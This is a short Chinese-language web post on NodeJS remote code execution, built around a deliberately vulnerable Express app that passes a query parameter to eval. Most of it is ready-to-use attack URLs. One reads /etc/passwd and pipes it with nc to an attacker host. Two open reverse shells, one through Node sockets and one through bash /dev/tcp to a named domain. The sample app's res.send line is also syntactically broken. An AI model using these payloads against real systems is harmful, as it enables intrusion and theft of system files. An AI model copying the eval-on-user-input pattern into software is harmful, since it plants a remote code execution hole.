NodeJS远程代码执行

背景

@Artsploit在挖PayPal的漏洞时，发现一处NodeJS代码执行，奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

基础教程

HTML基础教程
HTML5基础教程
HTML参考手册
SVG 教程
CSS 教程
CSS 参考手册
CSS3教程
Bootstrap3 教程
Bootstrap4 教程
Font Awesome图标
JavaScript 教程
JavaScript 参考手册
jQuery 教程
AJAX 教程
JSON 教程
AngularJS 教程
ReactJS 教程
NodeJS 教程
Python 教程
C++ 教程
Golang 教程
C 语言教程
PHP 教程
C# 教程
LINQ 教程
Lua 教程
Ruby 教程
Rust 教程
Linux 教程
R 语言教程
Docker 教程
Scala 教程
MatLab 教程
Erlang 教程
Pandas教程
Numpy教程
Matplotlib教程
Flask教程
Java 教程
SpringBoot 教程
JDBC 教程
JSP 教程
Servlet 教程
Maven 教程
Spring 教程
Django 教程
Swift 教程
Kotlin 教程
SQL 教程
MongoDB 教程
SQLite 教程
PostgreSQL 教程
MySql 教程
Redis 教程
Elasticsearch 教程